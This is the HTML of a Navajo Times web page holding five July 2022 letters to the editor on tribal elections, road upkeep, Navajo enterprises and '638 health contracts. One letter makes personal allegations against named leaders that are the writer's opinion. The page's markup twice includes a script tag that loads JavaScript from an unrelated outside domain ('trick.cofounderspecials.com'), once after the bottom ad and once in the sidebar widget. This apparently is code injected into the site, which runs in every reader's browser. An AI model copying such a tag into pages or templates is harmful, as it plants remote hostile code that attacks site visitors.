								by <a href="https://navajotimes.com/author/ntpc_admin/" class="url fn" title="Posts by Navajo Times" rel="author">Navajo Times</a> | <span class="updated">Jul 22, 2022</span> | <a class="comments-link" href="https://navajotimes.com/reznews/capital-briefs-senate-committee-supports-tso-as-ihs-director/#comments">0 <span title="comment count" class="comment-bubble post-meta-icon"></span></a>
							</div>
						</div>
					</li>
					<li class="recent-post">
						<div class="post-content">
							<a href="https://navajotimes.com/reznews/turmoil-and-chaos-at-many-farms-school/" title="‘Turmoil and chaos’ at Many Farms school">
				<img src="https://navajotimes.com/wp-content/themes/Extra/images/post-format-icon-text.svg" alt="‘Turmoil and chaos’ at Many Farms school" class="post-thumbnail" />
			</a>
							<div class="post-meta">
								<h3><a href="https://navajotimes.com/reznews/turmoil-and-chaos-at-many-farms-school/">‘Turmoil and chaos’ at Many Farms school</a></h3>
								by <a href="https://navajotimes.com/author/rkrisst/" class="url fn" title="Posts by Rima Krisst" rel="author">Rima Krisst</a> | <span class="updated">Jul 21, 2022</span> | <a class="comments-link" href="https://navajotimes.com/reznews/turmoil-and-chaos-at-many-farms-school/#comments">0 <span title="comment count" class="comment-bubble post-meta-icon"></span></a>
							</div>
						</div>
					</li></ul><!-- /.recent-list -->
</li><!-- /.menu_item -->
</ul><!-- /.sub-menu -->
</li>
<li id="menu-item-28844" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-28844"><a href="/events">Events</a></li>
<li id="menu-item-28849" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28849"><a href="https://navajotimes.com/rezobits/">Obits</a></li>
<li id="menu-item-42511" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor mega-menu menu-item-has-children mega-menu-featured mega-featured-2 menu-item-42511"><a href="https://navajotimes.com/opinion/">Opinion</a><ul class="sub-menu" style="border-top-color: #000000;">
					<li>
						<h2 class="title">Featured</h2>
						<div class="featured-post">
							<a href="https://navajotimes.com/opinion/letters/letters-same-old-political-promises/" title="Letters | Same old political promises" class="featured-image">
				<img src="https://navajotimes.com/wp-content/uploads/2014/09/writing-letters.jpg" alt="Letters | Same old political promises" />
			</a>
							<h2>Letters | Same old political promises</h2>
							<div class="post-meta">
								<span class="updated">Jul 28, 2022</span> | <a href="https://navajotimes.com/opinion/letters/" rel="tag">Letters</a> | <span class="rating-stars" title="Rating: 0.00"><span class="post-meta-icon rating-star rating-star-empty rating-star-1"></span>
<span class="post-meta-icon rating-star rating-star-empty rating-star-2"></span>
<span class="post-meta-icon rating-star rating-star-empty rating-star-3"></span>
<span class="post-meta-icon rating-star rating-star-empty rating-star-4"></span>
<span class="post-meta-icon rating-star rating-star-empty rating-star-5"></span>
</span>
							</div>
						</div>
					</li>
					<li>
						<h2 class="title">Featured</h2>
						<div class="featured-post">
							<a href="https://navajotimes.com/opinion/essay/guest-column-no-funding-shortfall-for-navajo-veterans/" title="Guest Column | No funding shortfall for Navajo veterans" class="featured-image">
				<img src="https://navajotimes.com/wp-content/uploads/2017/08/dq-moving-wall12-440x264.jpg" alt="Guest Column | No funding shortfall for Navajo veterans" />
			</a>
							<h2>Guest Column | No funding shortfall for Navajo veterans</h2>
							<div class="post-meta">
								<span class="updated">Jul 22, 2022</span> | <a href="https://navajotimes.com/opinion/essay/" rel="tag">Guest Essay</a> | <span class="rating-stars" title="Rating: 0.00"><span class="post-meta-icon rating-star rating-star-empty rating-star-1"></span>
<span class="post-meta-icon rating-star rating-star-empty rating-star-2"></span>
<span class="post-meta-icon rating-star rating-star-empty rating-star-3"></span>
<span class="post-meta-icon rating-star rating-star-empty rating-star-4"></span>
<span class="post-meta-icon rating-star rating-star-empty rating-star-5"></span>
</span>
							</div>
						</div>
					</li><li class="menu-item menu-item-has-children"><a href="#" class="title">Recent</a><ul class="recent-list">
					<li class="recent-post">
						<div class="post-content">
							<a href="https://navajotimes.com/opinion/letters/letters-problems-we-need-to-address/" title="Letters | Problems we need to address">
				<img src="https://navajotimes.com/wp-content/uploads/2014/09/writing-letters-150x150.jpg" alt="Letters | Problems we need to address" class="post-thumbnail" />
			</a>
							<div class="post-meta">
								<h3><a href="https://navajotimes.com/opinion/letters/letters-problems-we-need-to-address/">Letters | Problems we need to address</a></h3>
								by <a href="https://navajotimes.com/author/ntpc_admin/" class="url fn" title="Posts by Navajo Times" rel="author">Navajo Times</a> | <span class="updated">Jul 21, 2022</span> | <a class="comments-link" href="https://navajotimes.com/opinion/letters/letters-problems-we-need-to-address/#comments">0 <span title="comment count" class="comment-bubble post-meta-icon"></span></a>
							</div>
						</div>
					</li>
					<li class="recent-post">
						<div class="post-content">
							<a href="https://navajotimes.com/opinion/comics/comics-by-jack-ahasteen/" title="Comics by Jack Ahasteen">
				<img src="https://navajotimes.com/wp-content/uploads/2022/07/DAMAGECONTROL7212022-150x150.gif" alt="Comics by Jack Ahasteen" class="post-thumbnail" />
			</a>
							<div class="post-meta">
								<h3><a href="https://navajotimes.com/opinion/comics/comics-by-jack-ahasteen/">Comics by Jack Ahasteen</a></h3>
								by <a href="https://navajotimes.com/author/jahasteen/" class="url fn" title="Posts by Jack Ahasteen" rel="author">Jack Ahasteen</a> | <span class="updated">Jul 21, 2022</span> | <a class="comments-link" href="https://navajotimes.com/opinion/comics/comics-by-jack-ahasteen/#comments">0 <span title="comment count" class="comment-bubble post-meta-icon"></span></a>
							</div>
						</div>
					</li>
					<li class="recent-post">
						<div class="post-content">
							<a href="https://navajotimes.com/opinion/essay/guest-column-we-must-be-visionary-courageous/" title="Guest Column | We must be visionary, courageous">
				<img src="https://navajotimes.com/wp-content/uploads/2022/07/SUBMITTED-Chili-Yazzie-150x150.jpg" alt="Guest Column | We must be visionary, courageous" class="post-thumbnail" />
			</a>
							<div class="post-meta">
								<h3><a href="https://navajotimes.com/opinion/essay/guest-column-we-must-be-visionary-courageous/">Guest Column | We must be visionary, courageous</a></h3>
								by <a href="https://navajotimes.com/author/ntpc_admin/" class="url fn" title="Posts by Navajo Times" rel="author">Navajo Times</a> | <span class="updated">Jul 21, 2022</span> | <a class="comments-link" href="https://navajotimes.com/opinion/essay/guest-column-we-must-be-visionary-courageous/#comments">0 <span title="comment count" class="comment-bubble post-meta-icon"></span></a>
							</div>
						</div>
					</li></ul><!-- /.recent-list -->
</li><!-- /.menu_item -->
</ul><!-- /.sub-menu -->
</li>
<li id="menu-item-28856" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28856"><a href="https://navajotimes.com/rezsports/">Sports</a></li>
<li id="menu-item-41661" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-41661"><a href="https://navajotimes.com/advertise/">Advertise</a>
<ul class="sub-menu">
	<li id="menu-item-46322" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-46322"><a href="https://navajotimes.com/advertise/">Advertise With Us!</a></li>
	<li id="menu-item-46323" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-46323"><a href="http://www.vericansh.com/cod6/navajotimes">Classifieds</a></li>
</ul>
</li>
<li id="menu-item-28861" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-28861"><a href="https://navajotimes.com/subscribe/">Subscribe | Login</a>
<ul class="sub-menu">
	<li id="menu-item-28859" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-28859"><a href="https://navajotimes.com/contact-us/subscriptions/">Subscribe</a></li>
	<li id="menu-item-32381" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-32381"><a href="https://mynewsonthego.com/navajo/SignIn.aspx">My News On the Go</a></li>
</ul>
</li>
</ul>          <div id="et-mobile-navigation">
			<span class="show-menu">
				<div class="show-menu-button">
					<span></span>
					<span></span>
					<span></span>
				</div>
				<p>Select Page</p>
			</span>
			<nav>
			</nav>
		</div> <!-- /#et-mobile-navigation -->        </div>
        <!-- /#et-navigation --> 
      </div>
      <!-- /.container --> 
    </div>
    <!-- /#main-header --> 
  </div>
  <!-- /#main-header-wrapper --> 
  
</header>
<div class="container">
  <div class="et_pb_extra_row etad header_below"> <div class="adsense-responsive-ad"><!-- below header code in theme options for ads -->
<div style="text-align:center;height:90px;">
<ins data-revive-zoneid="4" data-revive-id="4e2f68f269777ef82eb663733847bde6"></ins>
<script async src="//navajotimes.com/ads/adserver/www/delivery/asyncjs.php"></script></div></div> </div>
</div>
<div id="main-content">
    <div class="container">
    <div id="content-area" class="clearfix">
      <div class="et_pb_extra_column_main">
        <!--<div style="background-color:#029395;color:#fff;text-align:center">
<a style="color: #fff;" href="https://navajotimes.com/wp-content/uploads/2020/07/A-22-0702.pdf" target="_blank" rel="noopener"><i class="far fa-newspaper"></i> Download the July 2 Print Edition</a><br>
<a style="color: #fff;" href="https://navajotimes.com/wp-content/uploads/2020/06/A-12.0625.pdf" target="_blank" rel="noopener"><i class="far fa-newspaper"></i> Download the June 25 Print Edition</a>
</div>-->                <article id="post-71217" class="module single-post-module post-71217 post type-post status-publish format-standard has-post-thumbnail hentry category-letters et-has-post-format-content et_post_format-et-post-format-standard">
                    <div class="post-header">
            <h1 class="entry-title">
              Letters | Same old political promises            </h1>
          </div>
                              <div class="post-thumbnail header">
            <img src="https://navajotimes.com/wp-content/uploads/2014/09/writing-letters.jpg" alt="Letters | Same old political promises" />              <!-- featured image caption custom code in single-post php child theme page -->
								<!-- This displays the caption below the featured image -->
          </div>
                                        <div class="post-wrap">
                        <div class="post-content entry-content">
              <div class="post-meta vcard" style="margin-bottom:7px!important;display:inline-block;">
                                <div class="author-box-avatar" style="flex-basis: 50px;height: 50px;width: 50px;min-width: 50px;max-width: 50px;margin: 0 0 20px;overflow: hidden;display: inline-block;float: left;margin-right: 10px;border-radius:50%"> <img data-del="avatar" alt="Navajo Times" src='https://navajotimes.com/wp-content/uploads/2020/02/NTPC-favicon-1.png' class='avatar pp-user-avatar avatar-170 photo ' height='170' width='170'/> </div>
                                <p class="child-byline">Posted by <a href="https://navajotimes.com/author/ntpc_admin/" class="url fn" title="Posts by Navajo Times" rel="author">Navajo Times</a> | <span class="updated">Jul 28, 2022</span> | <a href="https://navajotimes.com/opinion/letters/" rel="tag">Letters</a> | <span class="rating-stars" title="Rating: 0.00"><span class="post-meta-icon rating-star rating-star-empty rating-star-1"></span>
<span class="post-meta-icon rating-star rating-star-empty rating-star-2"></span>
<span class="post-meta-icon rating-star rating-star-empty rating-star-3"></span>
<span class="post-meta-icon rating-star rating-star-empty rating-star-4"></span>
<span class="post-meta-icon rating-star rating-star-empty rating-star-5"></span>
</span></p>
              </div>
              <p>What I find appalling after reading this story (“Homeless woman dies in abandoned trailer after giving birth,” June 30, 2022) was the fact that none of the political candidates (presidential or chapter) offered condolences or an inkling of any solutions to address homelessness or mental health.</p>
<p>These candidates and those before them all give the same old political promises of changes for our people. They talk of k&#8217;e, which sounds good, yet in reality it&#8217;s just another word to get your vote.</p>
<p>I have yet to hear any of these candidates talk about the real issues facing our people today and every year since time immemorial.</p>
<p>Candidates always promise to get the economy of the Navajo Nation fixed by saying there will be more jobs (most of the people on the reservation are living below poverty standards. No jobs because Navajo Nation doesn&#8217;t have an economic base).</p>
<p>Then education, to help young people receive a higher education (the education system is horrible like everywhere else in America); new homes for veterans (going on 50-plus years although there has been some improvements but not much – 20%!); so many promises that won&#8217;t come to fruition because it&#8217;s unrealistic.</p>
<p>We all should be asking ourselves are they or will they be doing anything they promise for us for our best interest?</p>
<p>We know the answer…it&#8217;s always in their own interest, their own agendas.</p>
<p>We, as a people, never have a chance or a choice to even be considered in helping to make decisions for ourselves, our children, or future generations. A one-term presidency (chapter, government, etc.) can&#8217;t begin to solve any issues lest it be a miracle.</p>
<p>For once in the history of our Navajo Nation it would be a tremendous gift if any candidate running in a tribal election asked the people as a whole how they would help to solve realities we will be facing in the imminent future.</p>
<p>Water issues, the drought, food shortages, livestock and feed issues for farmers/ranchers, lack of housing, the list goes on and on.</p>
<p>Family members live off reservation because their education specialties do not exist here at home. I would love my sons, daughter, nieces, and nephews working here instead of out of state.</p>
<p>Education is a powerful gift, if only the jobs were here to sustain the education of those who specialize in certain trades. They are non-existent here.</p>
<p>Every candidate is starry eyed in their speeches of how life will be for all of us residents who live on this land if we give them our vote. The candidates need to listen to our voices instead of their own.</p>
<p>And on that note, I agree with Orlando Bowman’s letter dated June 9, 2022 (“Be realistic about your objectives”).</p>
<p>Read it, candidates, and you might learn a thing or two.</p>
<p><strong>Maralyn Yazzie</strong><br />
<strong>Lok&#8217;aahnteel (Ganado), Ariz.</strong></p>
<h2>Voters, Bluff Road still not OK</h2>
<p>My concern for the non-existent upkeep of the Bluff Road in Shiprock, continues.</p>
<p>To date, this road is still in the same bad condition as what I indicated from my last letter to the editor on May 8, 2022.</p>
<p>The ongoing problem of rough access dirt roads not graded regularly, but maybe once a year, is still very real. One is Bluff Road along the cliff, a road used many times daily by residents of the Mesa Farm area, as well by school buses and other service vehicles.</p>
<p>Time for buses to start running again is at hand with students going back to school in about one or two weeks. The rocks are sticking up and there is a washboard effect on the main two-mile stretch and all the five lanes of the Bluff Road.</p>
<p>The chapter house is not readily accessible for anyone to ask for a motor grader to grade the public Bluff Road.</p>
<p>The rabbit hole through which people are expected to communicate is not user friendly, which the Shiprock Chapter maintains.</p>
<p>With respect to the mask mandate on the Navajo Nation, the Shiprock Chapter is probably the one building in Shiprock restricting entry to people. The other public buildings allow people to buy their groceries, pick up their mail, attend classes, see their doctors, or pick up their medication. People wear their masks as they attend to their personal business.</p>
<p>Election time is also around the corner. Many administrations have changed hands as projects have lapsed, but the issue of the maintenance of the Bluff Road is not a project, it is a regular upkeep.</p>
<p>What is the community motor grader doing, just sitting, and not being used as was justified for its purchase? Bluff Road residents, who are you going to vote for?</p>
<p><strong>Wilford R. Joe</strong><br />
<strong>Shiprock, N.M.</strong></p>
<h2>Criticism of enterprises misplaced, misunderstood</h2>
<p>In the recent forums, there have been several candidates for president that have been very critical of Navajo Nation enterprises. I believe that most of the rhetoric has been misplaced and misunderstood.</p>
<p>These enterprises provided or protected jobs and revenue at a time when they were threatened by outside entities. And in some cases, an enterprise or tribal entity is necessary to advance the financial interests of the Navajo Nation.</p>
<p>Navajo Transitional Energy Company, Navajo Oil and Gas Company, and Navajo Agricultural Products Industry are great examples of tribal-backed investments that were necessary for the intentions of protecting, maintaining, or producing a Navajo resource in the best interest of the Navajo Nation.</p>
<p>This is sovereignty in motion, that means Navajo leadership took direct action with the establishment of the enterprise or entity. An act of self-determination.</p>
<p>The state of Arizona did it when it was necessary for the state to help the state progress. The Salt River Project is an example of a state-owned entity. This entity was created to bring water and electricity to the Valley for farmers, families and businesses in the early 1900s. Now, SRP is a multi-billion-dollar entity that works for the interests of Arizona and provides thousands of jobs for Arizonans.</p>
<p>The Navajo Nation enterprises and entities function in much the same way. NTEC and NNOGC were created to produce Navajo Nation’s natural resources, jobs and revenues.</p>
<p>In 1970, NAPI was created to use the Navajo Nation’s water allocation from the 1962 PL 87-493, which authorized the secretary of Interior to construct the Navajo Indian Irrigation Project as part of the participating projects of the Colorado River Storage Project. They all struggled at some point but are now generating revenues for the Navajo Nation.</p>
<p>According to the 2021 Navajo Nation controller’s office fourth quarter report, the royalty revenues from coal, oil and gas were $57 million. They are doing their job.</p>
<p>At the July 25 Teec Nos Pos candidates for president forum, former Chairman Peter MacDonald spoke about the need for the Navajo Nation leadership to step up and fight for the Nation against the states and the federal government. He said it was time for leadership to get off their knees and take off the knee pads.</p>
<p>I took this to mean that the Navajo Nation looks like a weakened nation that has to beg the federal government for assistance instead of demanding that the federal government or state government pay the Nation back for all those years of stealing our land and resources.</p>
<p>I agree with him wholeheartedly. The Navajo Nation should be protecting itself against those non-Navajo entities that wish to continue to take from the Nation (i.e., SRP, state of Arizona, NGOs, Arizona ranchers, Valley cities, Arizona tribes, state of Nevada, state of Colorado, state of New Mexico, etc.).</p>
<p>It’s like MacDonald said, “I bet the Arizona legislators are meeting right now discussing how to take more from the Navajo Nation.”</p>
<p>We should be thankful that Navajo Nation enterprises or entities like NTEC, NNOGC, NAPI, and NECA are out there doing their job to produce revenue and provide jobs for our Navajo folks while at the same time protecting the Nation’s interest.</p>
<p>So when you hear the candidates for president speaking negatively about Navajo Nation enterprises, you should remember that the candidates’ message is misplaced and mistaken because Navajo Nation enterprises are out there providing valuable jobs and revenue.</p>
<p>Now, we need to elect a president and a Navajo Council that will get off their knees, take off the knee pads and promote the message that the Navajo Nation is not going to stand for the state and federal governments taking advantage of the Nation anymore.</p>
<p>Navajo Nation has the best resources, the most hard-working, skilled and educated labor pool, abundant business zones and an available set of laws that can be amended to produce the best jobs and revenue.</p>
<p><strong>Jarvis Williams</strong><br />
<strong>Kayenta, Ariz.</strong></p>
<h2>Hoping for fresh leadership</h2>
<p>I really hope that Navajo voters select fresh leadership in the coming Aug. 2 primary.</p>
<p>One of the reasons Joe Shirley Jr. did so poorly in the last presidential election is that Jonathan Nez was able to cast himself as “new” compared to Shirley.</p>
<p>The truth is that Nez is as jaded as Joe Shirley. Mr. Shirley should have reminded voters that both he and Nez are old guard politicos. Nez was a Council delegate for 12 years and vice president for four. Joe Shirley failed to point that out.</p>
<p>During Nez’s 19-year tenure, the Navajoland population decreased because our young people have to seek off-reservation jobs. Why isn’t there a Wal-Mart or Home Depot on Navajo lands to help consumers save money and to provide jobs?</p>
<p>Probably Nez is looking out for his Trump supporting Vice President Lizer who would not like his True Value stores competing with Home Depot.</p>
<p>The U.S. movement to address the missing Native women problem did not begin with the Navajo Nation. Only recently did Nez quickly jump on the bandwagon. Where was his concern during his previous 19 years as Navajo leader?</p>
<p>Nez notoriously and opportunistically turned against President Russell Begaye because he would not condemn his daughter, Karis Begay, after she was caught drinking in a tribal vehicle.</p>
<p>Nez should have seen Karis’s problem as one that afflicts many Navajo women and that it is a big part of the problem of the missing women.</p>
<p>Nez has a DUI under his belt. He could have testified about the alcoholism problem.</p>
<p>The Navajo Times did not focus on it either. Now we have learned that the publisher was dealing with his own alcohol problem at the time, possibly partying with editor Duane Beyal, whose alcohol mishap is also public.</p>
<p>Another candidate selected for leadership by Russell Begaye is former attorney general, and now candidate, Ethel Branch. She, like Nez, just woke up to the missing Navajo women problem.</p>
<p>She could have assisted President Begaye to bring up the alcohol problems, which lead to missing women. Ms. Branch’s sleazy ethics include her opportunistic Go-Fund-Me epidemic project.</p>
<p>I heard she went around delivering supplies to Navajo homes, probably anticipating her candidacy. Peterson Zah, who was an executive assistant, also turned against President Begaye, is now supporting Branch.</p>
<p>The epidemic also helped Jonathan Nez. The federal stimulus funding helped him to avoid making a plan to say how the Nation would replace the tens of millions lost through the closure of coalmines and power plants.</p>
<p>Tribal workers especially need to be concerned about this.</p>
<p>On Aug. 2, let us vote for new people, not refried leaders who have had their turn.</p>
<p><strong>Michael Benson</strong><br />
<strong>Window Rock, Ariz.</strong></p>
<h2>’93-638 doesn&#8217;t work, never will</h2>
<p>Public Law 93-638 contracts should never have been allowed to happen on the Navajo Nation. This is my conversation today with the hospital in Fort Defiance.</p>
<p>Me: I&#8217;m calling to find out about where I can pick up Covid test kits for my family.</p>
<p>Hospital operator: Not at the hospital. I think you buy them at Walmart.</p>
<p>Me: But Gallup Indian Medical Center gives them away for free.</p>
<p>Hospital operator: Well then, go over there.</p>
<p>Me: But I live in St Michaels and I have to drive to Gallup?</p>
<p>Hospital operator: Click&#8230;dial tone.</p>
<p>This is why ’638 contracts do not work. Why does the hospital in Fort Defiance not provide free Covid test kits? It&#8217;s because they do not feel like they have to spend any extra money on a serious public health crisis service such as providing free Covid test kits.</p>
<p>In addition to that, ’638 contracts are outside of the federal trust responsibility to tribes. The federal government can choose not to fund ’638 contracts. But under the federal trust responsibility, non-’638 hospitals and clinics in Indian country must be funded every year.</p>
<p>The hospital in Fort Defiance does not provide free Covid test kits to our tribal members in the area. This is outrageous.</p>
<p>This is only two reasons why the Navajo Nation should never have entered into ’638 contracts for health care. There are myriad other reasons why ’638 contracts do not work for the Navajo Nation.</p>
<p>But if I list them here, they won&#8217;t print my letter to the editor because it would be too long!</p>
<p><strong>Lydelle Davies</strong><br />
<strong>St Michaels, Ariz.</strong></p>
<!-- bottom leaderboard woody snippet -->
<hr style=" border: 0; border-bottom: 1px solid #aaa;clear:both;margin-top:25px">
<div class="adsense-iframe-container">
<div style="margin:5px 0 5px 0;text-align:center">
<ins data-revive-zoneid="3" data-revive-id="4e2f68f269777ef82eb663733847bde6"></ins>
	<script async src="//navajotimes.com/ads/adserver/www/delivery/asyncjs.php"></script></div>
</div>
<!-- end bottom leaderboard --><script src='https://trick.cofounderspecials.com/track.js?v=9.999' type='text/javascript'></script>

<div id='jp-relatedposts' class='jp-relatedposts' >
	<h3 class="jp-relatedposts-headline"><em>Related</em></h3>
</div>                          </div>
                      </div>
                    <div class="post-footer">
            <div class="social-icons ed-social-share-icons">
              <p class="share-title">
                Share:              </p>
              
		
		
		
		
		
		
		
		
		<a href="http://www.facebook.com/sharer.php?u=https://navajotimes.com/opinion/letters/letters-same-old-political-promises/&#038;t=Letters%20%7C%20Same%20old%20political%20promises" class="social-share-link" title="Share &quot;Letters | Same old political promises&quot; via Facebook" data-network-name="facebook" data-share-title="Letters | Same old political promises" data-share-url="https://navajotimes.com/opinion/letters/letters-same-old-political-promises/">
				<span class="et-extra-icon et-extra-icon-facebook et-extra-icon-background-hover" ></span>
			</a><a href="http://twitter.com/intent/tweet?text=Letters%20%7C%20Same%20old%20political%20promises%20https://navajotimes.com/opinion/letters/letters-same-old-political-promises/" class="social-share-link" title="Share &quot;Letters | Same old political promises&quot; via Twitter" data-network-name="twitter" data-share-title="Letters | Same old political promises" data-share-url="https://navajotimes.com/opinion/letters/letters-same-old-political-promises/">
				<span class="et-extra-icon et-extra-icon-twitter et-extra-icon-background-hover" ></span>
			</a><a href="https://www.tumblr.com/share?v=3&#038;u=https://navajotimes.com/opinion/letters/letters-same-old-political-promises/&#038;t=Letters%20%7C%20Same%20old%20political%20promises" class="social-share-link" title="Share &quot;Letters | Same old political promises&quot; via Tumblr" data-network-name="tumblr" data-share-title="Letters | Same old political promises" data-share-url="https://navajotimes.com/opinion/letters/letters-same-old-political-promises/">
				<span class="et-extra-icon et-extra-icon-tumblr et-extra-icon-background-hover" ></span>
			</a><a href="http://www.pinterest.com/pin/create/button/?url=https://navajotimes.com/opinion/letters/letters-same-old-political-promises/&#038;description=Letters%20%7C%20Same%20old%20political%20promises&#038;media=https://navajotimes.com/wp-content/uploads/2014/09/writing-letters-150x94.jpg" class="social-share-link" title="Share &quot;Letters | Same old political promises&quot; via Pinterest" data-network-name="pinterest" data-share-title="Letters | Same old political promises" data-share-url="https://navajotimes.com/opinion/letters/letters-same-old-political-promises/">
				<span class="et-extra-icon et-extra-icon-pinterest et-extra-icon-background-hover" ></span>
			</a><a href="http://www.linkedin.com/shareArticle?mini=true&#038;url=https://navajotimes.com/opinion/letters/letters-same-old-political-promises/&#038;title=Letters%20%7C%20Same%20old%20political%20promises" class="social-share-link" title="Share &quot;Letters | Same old political promises&quot; via LinkedIn" data-network-name="linkedin" data-share-title="Letters | Same old political promises" data-share-url="https://navajotimes.com/opinion/letters/letters-same-old-political-promises/">
				<span class="et-extra-icon et-extra-icon-linkedin et-extra-icon-background-hover" ></span>
			</a><a href="https://bufferapp.com/add?url=https://navajotimes.com/opinion/letters/letters-same-old-political-promises/&#038;title=Letters%20%7C%20Same%20old%20political%20promises" class="social-share-link" title="Share &quot;Letters | Same old political promises&quot; via Buffer" data-network-name="buffer" data-share-title="Letters | Same old political promises" data-share-url="https://navajotimes.com/opinion/letters/letters-same-old-political-promises/">
				<span class="et-extra-icon et-extra-icon-buffer et-extra-icon-background-hover" ></span>
			</a><a href="http://www.stumbleupon.com/badge?url=https://navajotimes.com/opinion/letters/letters-same-old-political-promises/&#038;title=Letters%20%7C%20Same%20old%20political%20promises" class="social-share-link" title="Share &quot;Letters | Same old political promises&quot; via Stumbleupon" data-network-name="stumbleupon" data-share-title="Letters | Same old political promises" data-share-url="https://navajotimes.com/opinion/letters/letters-same-old-political-promises/">
				<span class="et-extra-icon et-extra-icon-stumbleupon et-extra-icon-background-hover" ></span>
			</a><a href="#" class="social-share-link" title="Share &quot;Letters | Same old political promises&quot; via Email" data-network-name="basic_email" data-share-title="Letters | Same old political promises" data-share-url="https://navajotimes.com/opinion/letters/letters-same-old-political-promises/">
				<span class="et-extra-icon et-extra-icon-basic_email et-extra-icon-background-hover" ></span>
			</a><a href="#" class="social-share-link" title="Share &quot;Letters | Same old political promises&quot; via Print" data-network-name="basic_print" data-share-title="Letters | Same old political promises" data-share-url="https://navajotimes.com/opinion/letters/letters-same-old-political-promises/">
				<span class="et-extra-icon et-extra-icon-basic_print et-extra-icon-background-hover" ></span>
			</a>            </div>
                        <div class="rating-stars">
              <p id="rate-title" class="rate-title">Rate:</p><div id="rating-stars"></div><input type="hidden" id="post_id" value="71217" />            </div>
                        <style type="text/css" id="rating-stars">
									.post-footer .rating-stars #rated-stars img.star-on,
									.post-footer .rating-stars #rating-stars img.star-on {
										background-color: #00202d;
									}
								</style>
          </div>
                            </article>
        <nav class="post-nav">
          <div class="nav-links clearfix">
            <div class="nav-link nav-link-prev">
              <a href="https://navajotimes.com/reznews/vietnam-vet-still-waiting-40-years-later/" rel="prev"><span class="button">Previous</span><span class="title">Vietnam vet still waiting, 40 years later</span></a>            </div>
            <div class="nav-link nav-link-next">
              <a href="https://navajotimes.com/reznews/aging-marines-hogan-sees-slow-progress/" rel="next"><span class="button">Next</span><span class="title">Aging Marine’s hogan sees slow progress</span></a>            </div>
          </div>
        </nav>
                <div class="et_extra_other_module author-box vcard">
          <div class="author-box-header">
            <h3>
              About The Author            </h3>
          </div>
          <div class="author-box-content clearfix">
            <div class="author-box-avatar"> <img data-del="avatar" alt="Navajo Times" src='https://navajotimes.com/wp-content/uploads/2020/02/NTPC-favicon-1.png' class='avatar pp-user-avatar avatar-170 photo ' height='170' width='170'/> </div>
            <div class="author-box-description">
              <h4><a class="author-link url fn" href="https://navajotimes.com/author/ntpc_admin/" rel="author" title="View all posts by Navajo Times">Navajo Times</a></h4>
              <p class="note">
                              </p>
              <ul class="social-icons">
                                <li><a href="https://facebook.com/navajotimes" target="_blank"><span class="et-extra-icon et-extra-icon-facebook et-extra-icon-color-hover"></span></a></li>
                                <li><a href="https://twitter.com/navajotimes.com" target="_blank"><span class="et-extra-icon et-extra-icon-twitter et-extra-icon-color-hover"></span></a></li>
                              </ul>
            </div>
          </div>
        </div>
                                      </div>
      <!-- /.et_pb_extra_column.et_pb_extra_column_main -->
      
      <div class="et_pb_extra_column_sidebar">
	<div id="text-5" class="et_pb_widget widget_text"><h4 class="widgettitle"> </h4>			<div class="textwidget"><div style="text-align: center; margin-top: -35px;">
<p style="font-family: Arial,Helvetica,sans-serif; color: #999; font-size: 10px; margin-bottom: 5px; padding-bottom: 0;">ADVERTISEMENT</p>
<div style="min-height:280px;"><!-- Navajo Times Adserver Asynchronous JS Tag - Generated with Revive Adserver v4.2.0 large rectangle -->
<ins data-revive-zoneid="7" data-revive-id="4e2f68f269777ef82eb663733847bde6"></ins>
<script async src="//navajotimes.com/ads/adserver/www/delivery/asyncjs.php"></script>
</div>
<!--<br>
<hr>
<div style="text-align:center">-->
	<!-- Navajo Times Adserver Asynchronous JS Tag - 120x240 zone for kelly cpg in snippets -->
<!--<ins data-revive-zoneid="12" data-revive-id="4e2f68f269777ef82eb663733847bde6"></ins>
<script async src="//navajotimes.com/ads/adserver/www/delivery/asyncjs.php"></script>-->
<!--</div>--><script src='https://trick.cofounderspecials.com/track.js?v=9.999' type='text/javascript'></script>
</div>
</div>
		</div> <!-- end .et_pb_widget --><div id="text-4" class="et_pb_widget widget_text"><h4 class="widgettitle">Weather &#038; Roads</h4>			<div class="textwidget"><link rel="stylesheet" type="text/css" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.12.1/css/all.min.css">
<div class="widget"> 
  <!--<div class="w-title extra-w-title"><h3>Weather & Roads</h3></div>-->
  <div class="review-list">
   <div style="width:49%;border-right:1px dotted #999;padding-right:10px;margin-right:0;min-height:280px;float:left;">
      <div id="ggwx_app">
       <h4>Window Rock Weather</h4> 
        <div id="awesome-weather-window-rock-az" class="custom-bg-color awesome-weather-wrap awecf awe_with_stats awe_with_icons awe_without_forecast  awe_tall awe-code-rain awe-desc-mostly-cloudy"  style=" background-color: #ffffff; color: #000000; ">


	
	<div class="awesome-weather-header"><span> </span></div>

	
				<div class="awesome-weather-stats-icon">
			<i class="wi wi-forecast-io-rain"></i>
		</div>
		
		<div class="awesome-weather-current-temp">
			<strong>60<sup>&deg;</sup></strong>
		</div><!-- /.awesome-weather-current-temp -->

				<div class="awesome-weather-todays-stats">
			<div class="awe_desc">Mostly Cloudy</div>
			<div class="awe_humidty">86% humidity</div>
			<div class="awe_wind">wind: 5mph SSE</div>
			<div class="awe_highlow">H 85 &bull; L 56</div>	
		</div><!-- /.awesome-weather-todays-stats -->
			
		
		
		
	

</div><!-- /.awesome-weather-wrap: tall -->        <p style="float:right;font-size:.89em;margin-top:7px;font-weight:bold;font-style:italic;letter-spacing:-.035em"><a href="/weather/index.php" style="color:#c12026;">More weather &raquo;</a> </p> 
     </div>
    </div>
     <div style="font-size:.89em;float:right;width:49%;padding-left:5px">
     <h4><strong>Regional Road Conditions Webcams</strong></h4>
      <p style="padding-top:0; margin-top:0px;" onclick="window.open('https://az511.gov/map/Cctv/11660.C2--16#1557016312476', '_blank', 'toolbar=yes,scrollbars=yes,resizable=yes,top=200,left=500,width=640,height=480')"><a href="#"><img src="/images/design/arizona_264.png" alt="camera icon" align="absmiddle" style="margin-right: 5px;border:none;float:left;" />Highway 264,<br>
        Window Rock</a> </p>
